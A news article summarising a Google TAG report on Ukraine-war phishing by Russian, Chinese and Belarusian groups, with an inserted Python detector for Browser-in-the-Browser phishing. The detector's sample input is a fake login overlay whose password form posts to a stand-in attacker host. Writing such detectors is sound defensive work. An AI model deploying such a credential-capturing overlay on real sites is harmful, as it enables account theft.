NATO Countries Targeted in Russian Phishing Attacks, Google Reports
Threat Actors Lure Targets to Open Malicious Emails or Click on Malicious Links.
According to the Google Threat Analysis Group (TAG), many threat actors are exploiting the Russian invasion of Ukraine as a lure for phishing and malware cyberattacks against Eastern European and NATO countries, as well as against Ukraine itself.
As Google’s report reads:
Government-backed actors from China, Iran, North Korea, and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links. (…) Financially motivated and criminal actors are also using current events as a means for targeting users. For example, one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine. TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.
The report also highlights credential phishing cyberattacks by a Russia-based hacking group known as COLDRIVER against a NATO Center of Excellence and Eastern European forces.
A Ukrainian defense contractor and many US-based non-governmental organizations (NGOs) and think tanks were also among the targets of Russian threat actors.
Curious Gorge, a hacking group linked to China’s PLA SSF (People’s Liberation Army Strategic Support Force), targeted government and military institutions in Ukraine, Russia, Kazakhstan, and Mongolia, according to Google security researchers.
Ghostwriter, a threat actor reportedly backed by Belarus, was seen employing a new phishing tactic called Browser-in-the-Browser (BitB) phishing, a technique publicly documented in mid-March that other government-sponsored APTs have since adopted.
Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites. The new technique (…) draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site. Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.
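The mechanism the quoted passage describes lends itself to a simple static check from the defender's side. The following is an added example, not code from the article or from Google TAG: it parses a constructed HTML page (the `.invalid` hosts are placeholders, not indicators from the report) and flags a positioned overlay whose visible address text names one host while a form inside the same overlay posts credentials to a different host, which is the BitB pattern.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Constructed sample of a compromised page carrying a BitB dialog; the
# .invalid hosts are placeholders, not indicators from the report.
SAMPLE_HTML = """<html><body><h1>Community forum</h1>
<div class="popup" style="position:fixed; top:20%; left:30%">
  <div class="addressbar">https://passport.i.ua/login</div>
  <form action="https://attacker-controlled.invalid/collect" method="post">
    <input name="user"><input name="pass" type="password"></form>
</div></body></html>"""

class BitbScanner(HTMLParser):
    """Records URLs shown as text and form targets, per positioned overlay."""
    def __init__(self):
        super().__init__()
        self._stack, self._next_id = [], 0   # open elements: (tag, overlay_id)
        self.shown, self.forms = {}, {}      # overlay_id -> set of hosts
    def _overlay(self):
        return self._stack[-1][1] if self._stack else None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        overlay = self._overlay()
        if "position:fixed" in style or "position:absolute" in style:
            self._next_id += 1               # a new floating "window" starts
            overlay = self._next_id
        if tag == "form" and overlay is not None:
            host = urlparse(a.get("action") or "").hostname
            if host:
                self.forms.setdefault(overlay, set()).add(host.lower())
        self._stack.append((tag, overlay))
    def handle_endtag(self, tag):             # also drops unclosed void tags
        while self._stack and self._stack.pop()[0] != tag:
            pass
    def handle_data(self, data):
        overlay = self._overlay()
        if overlay is not None:
            for host in URL_RE.findall(data):
                self.shown.setdefault(overlay, set()).add(host.lower())

def find_bitb_dialogs(html, page_host):
    """(shown_host, post_host) pairs where an overlay's fake address bar names
    a host other than the real page and its form posts somewhere else again."""
    s = BitbScanner()
    s.feed(html)
    return sorted((shown, target) for oid, hosts in s.shown.items()
                  for shown in hosts for target in s.forms.get(oid, ())
                  if shown != page_host and target not in (page_host, shown))
```

The check is static and only catches dialogs present in the served markup; a dialog assembled by script at runtime needs the same comparison run against the live DOM.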
As the same report further explains, credential phishing attempts by Belarusian state hackers have previously targeted Ukrainian government and military personnel as well as European refugee aid officials.
Financially motivated and criminal actors are also using current events as a means for targeting users. For example, one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine. (…) TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.
What Other Cyberattacks Have Targeted Ukraine and Other Countries?
As BleepingComputer notes, Google’s recent report follows one Google TAG published in early March about malicious activity linked to Russia’s conflict in Ukraine, which described attempts by Russian, Chinese, and Belarusian state-backed hackers to breach Ukrainian and European organizations and politicians.
Google also confirmed in March that Gmail users affiliated with the US government were targeted by phishing campaigns from the Chinese-backed APT31 hacking group.
This wave of attacks has also included distributed denial-of-service (DDoS) operations against the Ukrainian government and state-owned banks, as well as a variety of malware campaigns, as the same publication mentions.
What Measures Has Google Implemented?
Project Shield, Google’s free DDoS protection service, has been expanded to help the Ukrainian government, embassies around the world, and other governments keep their websites online.